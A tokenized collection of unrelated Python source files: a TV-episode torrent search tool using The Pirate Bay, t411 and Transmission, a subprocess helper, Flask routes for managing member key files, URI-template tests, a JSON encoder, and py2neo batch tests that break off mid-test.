title . lower ( ) , self . season , self . season ) <EOL> else : <EOL> try : <EOL> print ( "<STR_LIT>" % ( self . tvdb . data [ '<STR_LIT>' ] , self . season , self . episode , self . tvdb . get_episode ( int ( self . season ) , int ( self . episode ) ) [ '<STR_LIT>' ] ) ) <EOL> except : <EOL> pass <EOL> regexp = '<STR_LIT>' % ( self . title . lower ( ) , self . season , self . episode , self . season , self . episode ) <EOL> return regexp <EOL> def buildlist ( self , category = tpb . CATEGORIES . VIDEO . TV_SHOWS ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> s = self . source . search ( self . title . lower ( ) , category = category ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . __tpb_error_ ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> logging . info ( "<STR_LIT>" % ( self . title . lower ( ) , tpb_categories [ category ] ) ) <EOL> try : <EOL> for t in s . items ( ) : <EOL> pass <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> self . __tpb_error_ ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> torrentlist = [ ] <EOL> for t in s . items ( ) : <EOL> if ( re . search ( self . regexp , t . title . lower ( ) ) and ( t . seeders >= self . seeders_min ) ) : <EOL> torrentlist . append ( ( t . title , t . seeders , t . magnet_link , t . torrent_link ) ) <EOL> logging . debug ( "<STR_LIT>" % ( len ( torrentlist ) , tpb_categories [ category ] ) ) <EOL> return torrentlist <EOL> def getbest ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def getall ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( self . list ) > <NUM_LIT:0> ) : <EOL> return self . list <EOL> else : <EOL> return None <EOL> def printSyntax ( ) : <EOL> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> def printVersion ( ) : <EOL> """<STR_LIT>""" <EOL> print ( __appname__ + "<STR_LIT>" + __version__ ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> global _DEBUG_ <EOL> _DEBUG_ = False <EOL> global tpb_url <EOL> global tpb_categories <EOL> global transmission_rcp <EOL> global tvdbapi_tag <EOL> serie_title = None <EOL> search_type = None <EOL> serie_season = "<STR_LIT>" <EOL> serie_episode = "<STR_LIT>" <EOL> seeders_min = <NUM_LIT:0> <EOL> download_tag = False <EOL> display_all_tag = False <EOL> hd_tag = False <EOL> save_torrent_dir = None <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> except getopt . GetoptError as err : <EOL> print ( "<STR_LIT>" % str ( err ) ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for opt , arg in opts : <EOL> if opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> serie_title = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> serie_season = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> serie_episode = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> seeders_min = int ( arg ) <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> hd_tag = True <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> download_tag = True <EOL> elif opt in ( "<STR_LIT:-c>" ) : <EOL> transmission_rcp = arg <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> try : <EOL> tpb_url = arg <EOL> except : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> display_all_tag = True <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> tvdbapi_tag = False <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> printVersion ( ) <EOL> printSyntax ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> printVersion ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> _DEBUG_ = True <EOL> logging . basicConfig ( <EOL> level = logging . INFO , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> _DEBUG_ = True <EOL> logging . basicConfig ( <EOL> level = logging . DEBUG , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> ) <EOL> logging . debug ( "<STR_LIT>" ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> if arg == '<STR_LIT>' or arg == '<STR_LIT>' : <EOL> search_type = arg <EOL> else : <EOL> logging . error ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif opt in ( "<STR_LIT>" ) : <EOL> logging . info ( '<STR_LIT>' % arg ) <EOL> save_torrent_dir = arg <EOL> else : <EOL> printSyntax ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if ( not _DEBUG_ ) : <EOL> logging . basicConfig ( <EOL> level = logging . ERROR , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> ) <EOL> logging . info ( "<STR_LIT>" % ( __appname__ , __version__ ) ) <EOL> if ( serie_title is None ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" % serie_title ) <EOL> if search_type == None : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> if search_type == '<STR_LIT>' : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( serie_season != "<STR_LIT>" ) : <EOL> logging . info ( "<STR_LIT>" % serie_season ) <EOL> if ( serie_episode != "<STR_LIT>" ) : <EOL> logging . info ( "<STR_LIT>" % serie_episode ) <EOL> if ( download_tag and not transmissionrpc_tag ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if ( hd_tag ) : <EOL> tpb_categories . update ( tpb_categories_hd ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> tpb_categories . update ( tpb_categories_ld ) <EOL> tpb_categories . update ( tpb_categories_hd ) <EOL> if ( download_tag and display_all_tag ) : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if ( download_tag and not display_all_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> try : <EOL> transmission_rcp_host , transmission_rcp_port = transmission_rcp . split ( '<STR_LIT::>' ) <EOL> transmission_rcp_port = int ( transmission_rcp_port ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( display_all_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( tvdbapi_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" ) <EOL> if ( save_torrent_dir and not download_tag ) : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if search_type == '<STR_LIT>' : <EOL> logging . info ( "<STR_LIT>" % tpb_url ) <EOL> serie = series_pb ( tpb_url = tpb_url , title = serie_title , season = serie_season , episode = serie_episode , seeders_min = seeders_min ) <EOL> else : <EOL> serie = series_t411 ( title = serie_title , season = serie_season , episode = serie_episode , seeders_min = seeders_min , directory_download = save_torrent_dir ) <EOL> best = serie . getbest ( ) <EOL> if ( best is not None ) : <EOL> if ( display_all_tag ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> for r in serie . getall ( ) : <EOL> print ( "<STR_LIT:*>" * <NUM_LIT> ) <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:0> ] ) <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:1> ] ) <EOL> if search_type == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" % r [ <NUM_LIT:2> ] ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" % best [ <NUM_LIT:0> ] ) <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:0> ] ) <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:1> ] ) <EOL> if search_type == '<STR_LIT>' : <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" % best [ <NUM_LIT:2> ] ) <EOL> else : <EOL> print ( "<STR_LIT>" % serie_title ) <EOL> if ( ( best is not None ) and download_tag ) : <EOL> uri = None <EOL> if search_type == '<STR_LIT>' : <EOL> uri = best [ <NUM_LIT:2> ] <EOL> logging . info ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" % uri ) <EOL> try : <EOL> tc = transmissionrpc . Client ( transmission_rcp_host , port = transmission_rcp_port ) <EOL> except : <EOL> print ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> print ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> logging . info ( "<STR_LIT>" % ( transmission_rcp_host , transmission_rcp_port ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> try : <EOL> if search_type == '<STR_LIT>' : <EOL> tc . add_uri ( best [ <NUM_LIT:2> ] ) <EOL> else : <EOL> tc . add ( serie . downloadbest ( ) ) <EOL> except : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import subprocess <EOL> import threading <EOL> def run_command ( cmd_list , timeout = <NUM_LIT> ) : <EOL> process = [ None ] <EOL> stdout = [ None ] <EOL> stderr = [ None ] <EOL> def proc_fn ( ) : <EOL> process [ <NUM_LIT:0> ] = subprocess . Popen ( cmd_list , universal_newlines = True , shell = False , <EOL> stdin = subprocess . PIPE , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> stdout [ <NUM_LIT:0> ] , stderr [ <NUM_LIT:0> ] = process [ <NUM_LIT:0> ] . communicate ( ) <EOL> proc_thread = threading . Thread ( target = proc_fn ) <EOL> proc_thread . start ( ) <EOL> proc_thread . join ( timeout ) <EOL> if not proc_thread . is_alive ( ) : <EOL> return stdout [ <NUM_LIT:0> ] + stderr [ <NUM_LIT:0> ] <EOL> else : <EOL> process [ <NUM_LIT:0> ] . terminate ( ) <EOL> proc_thread . join ( <NUM_LIT:0.5> ) <EOL> if proc_thread . is_alive ( ) : <EOL> process [ <NUM_LIT:0> ] . kill ( ) <EOL> return "<STR_LIT>" </s>
<s> from git2web import app <EOL> from git2web . functions import list_of_members <EOL> from werkzeug import secure_filename <EOL> from flask import session , redirect , g , url_for , render_template , flash , request <EOL> import os <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def showpeople ( ) : <EOL> if not session . get ( '<STR_LIT>' ) : <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> names = list_of_members ( ) <EOL> return render_template ( '<STR_LIT>' , names = names ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def add_persons ( ) : <EOL> if not session . get ( '<STR_LIT>' ) : <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> f = request . files [ '<STR_LIT>' ] <EOL> filename = secure_filename ( f . filename ) <EOL> filepath = os . path . join ( app . config [ '<STR_LIT>' ] , '<STR_LIT>' , filename ) <EOL> if filename . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> if not os . path . exists ( filepath ) : <EOL> f . save ( filepath ) <EOL> flash ( '<STR_LIT>' ) <EOL> else : <EOL> flash ( '<STR_LIT>' ) <EOL> else : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def delete_person ( name ) : <EOL> keyfile = name + '<STR_LIT>' <EOL> keypath = os . path . join ( app . config [ '<STR_LIT>' ] , '<STR_LIT>' , keyfile ) <EOL> if os . path . exists ( keypath ) : <EOL> if not os . remove ( keypath ) : <EOL> flash ( name + '<STR_LIT>' ) <EOL> else : <EOL> flash ( '<STR_LIT>' + name ) <EOL> else : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) </s>
<s> from __future__ import unicode_literals <EOL> try : <EOL> from collections import OrderedDict <EOL> except ImportError : <EOL> from . util . ordereddict import OrderedDict <EOL> from httpstream import URI , URITemplate <EOL> def test_expansion_with_no_variables ( ) : <EOL> uri_template = URITemplate ( "<STR_LIT:{}>" ) <EOL> uri = uri_template . expand ( ) <EOL> assert uri == URI ( "<STR_LIT>" ) <EOL> def _test_expansions ( expansions ) : <EOL> variables = { <EOL> "<STR_LIT:count>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:hello>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:path>" : "<STR_LIT>" , <EOL> "<STR_LIT:list>" : ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : OrderedDict ( [ ( "<STR_LIT>" , "<STR_LIT:;>" ) , ( "<STR_LIT>" , "<STR_LIT:.>" ) , ( "<STR_LIT>" , "<STR_LIT:U+002C>" ) ] ) , <EOL> "<STR_LIT:v>" : "<STR_LIT>" , <EOL> "<STR_LIT:x>" : "<STR_LIT>" , <EOL> "<STR_LIT:y>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : dict ( [ ] ) , <EOL> "<STR_LIT>" : None , <EOL> } <EOL> for template , expansion in expansions . items ( ) : <EOL> print ( template , "<STR_LIT>" , expansion ) <EOL> uri_template = URITemplate ( template ) <EOL> uri = uri_template . expand ( ** variables ) <EOL> assert uri == expansion <EOL> def test_empty_expansion ( ) : <EOL> _test_expansions ( { <EOL> None : None , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_simple_strings ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_reserved_strings ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT:value>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_fragments ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:foo>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_labels ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:X>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:X>" , <EOL> "<STR_LIT>" : "<STR_LIT:X>" , <EOL> } ) <EOL> def test_can_expand_path_segments ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_path_parameters ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_form_queries ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_expand_form_query_continuations ( ) : <EOL> _test_expansions ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> def test_can_parse_none_uri_template ( ) : <EOL> template = URITemplate ( None ) <EOL> assert template . string is None <EOL> uri = template . expand ( ) <EOL> assert uri . string is None <EOL> def test_can_parse_uri_template ( ) : <EOL> template = URITemplate ( "<STR_LIT>" ) <EOL> assert template . string == "<STR_LIT>" <EOL> def test_uri_template_equality ( ) : <EOL> template1 = URITemplate ( "<STR_LIT>" ) <EOL> template2 = URITemplate ( "<STR_LIT>" ) <EOL> assert template1 == template2 <EOL> def test_uri_template_inequality ( ) : <EOL> template1 = URITemplate ( "<STR_LIT>" ) <EOL> template2 = URITemplate ( "<STR_LIT>" ) <EOL> assert template1 != template2 <EOL> def test_uri_template_equality_with_string ( ) : <EOL> template = URITemplate ( "<STR_LIT>" ) <EOL> string = "<STR_LIT>" <EOL> assert template == string <EOL> def test_uri_template_equality_when_none ( ) : <EOL> template = URITemplate ( None ) <EOL> none = None <EOL> assert template == none <EOL> def test_uri_template_is_hashable ( ) : <EOL> template = URITemplate ( "<STR_LIT>" ) <EOL> hashed = hash ( template ) <EOL> assert hashed </s>
<s> from __future__ import unicode_literals <EOL> from datetime import date , time , datetime <EOL> from decimal import Decimal <EOL> import json <EOL> class JSONEncoder ( json . JSONEncoder ) : <EOL> def default ( self , obj ) : <EOL> if isinstance ( obj , ( datetime , date , time ) ) : <EOL> return obj . isoformat ( ) <EOL> if isinstance ( obj , Decimal ) : <EOL> return str ( obj ) <EOL> if isinstance ( obj , ( set , frozenset ) ) : <EOL> return list ( obj ) <EOL> if isinstance ( obj , complex ) : <EOL> return [ obj . real , obj . imag ] <EOL> return json . JSONEncoder . default ( self , obj ) </s>
<s> from sys import version_info <EOL> try : <EOL> from unittest . mock import Mock , patch <EOL> except ImportError : <EOL> from mock import Mock , patch <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> if version_info >= ( <NUM_LIT:3> , ) : <EOL> long = int <EOL> else : <EOL> long = long <EOL> def assert_repr ( obj , repr_string , python2_repr_string = None ) : <EOL> if version_info >= ( <NUM_LIT:3> , ) or python2_repr_string is None : <EOL> assert repr ( obj ) == repr_string <EOL> else : <EOL> assert repr ( obj ) == python2_repr_string </s>
<s> from unittest import skipIf <EOL> from py2neo import DBMS , Node , Relationship , cast_node , cast_relationship <EOL> from py2neo . database . status import CypherSyntaxError , ConstraintError <EOL> from py2neo . ext . batman import BatchRunner , WriteBatch , CypherJob , BatchError , Job , Target , NodePointer , ManualIndexWriteBatch , BatchFinished <EOL> from test . util import GraphTestCase <EOL> dbms = DBMS ( ) <EOL> version_2_1 = ( <NUM_LIT:2> , <NUM_LIT:1> ) <= dbms . kernel_version < ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> class BatchTestCase ( GraphTestCase ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( BatchTestCase , self ) . __init__ ( * args , ** kwargs ) <EOL> self . runner = BatchRunner ( self . graph ) <EOL> class NodeCreationTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> def test_can_create_single_empty_node ( self ) : <EOL> self . batch . create ( Node ( ) ) <EOL> a , = self . batch . run ( ) <EOL> assert isinstance ( a , Node ) <EOL> assert not a <EOL> def test_can_create_multiple_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" } ) ) <EOL> self . batch . create ( Node ( name = "<STR_LIT>" ) ) <EOL> alice , bob , carol = self . batch . run ( ) <EOL> assert isinstance ( alice , Node ) <EOL> assert isinstance ( bob , Node ) <EOL> assert isinstance ( carol , Node ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert carol [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> class RelationshipCreationTestCase ( GraphTestCase ) : <EOL> def setUp ( self ) : <EOL> self . batch = ManualIndexWriteBatch ( self . graph ) <EOL> def test_can_create_relationship_with_new_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> alice , bob , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_relationship_with_existing_nodes ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , bob = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . create ( ( alice , "<STR_LIT>" , bob ) ) <EOL> knows , = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_relationship_with_existing_start_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> alice , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( alice , "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> bob , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_relationship_with_existing_end_node ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> bob , = self . batch . run ( ) <EOL> self . batch . jobs = [ ] <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , bob ) ) <EOL> alice , knows = self . batch . run ( ) <EOL> assert isinstance ( knows , Relationship ) <EOL> assert knows . start_node ( ) == alice <EOL> assert knows . type ( ) == "<STR_LIT>" <EOL> assert knows . end_node ( ) == bob <EOL> assert dict ( knows ) == { } <EOL> self . recycling = [ knows , alice , bob ] <EOL> def test_can_create_multiple_relationships ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) ) <EOL> self . batch . create ( ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT:2> ) ) <EOL> self . batch . create ( ( <NUM_LIT:2> , "<STR_LIT>" , <NUM_LIT:0> ) ) <EOL> alice , bob , carol , ab , bc , ca = self . batch . run ( ) <EOL> for relationship in [ ab , bc , ca ] : <EOL> assert isinstance ( relationship , Relationship ) <EOL> assert relationship . type ( ) == "<STR_LIT>" <EOL> def test_can_create_overlapping_relationships ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . create ( ( <NUM_LIT:0> , "<STR_LIT>" , 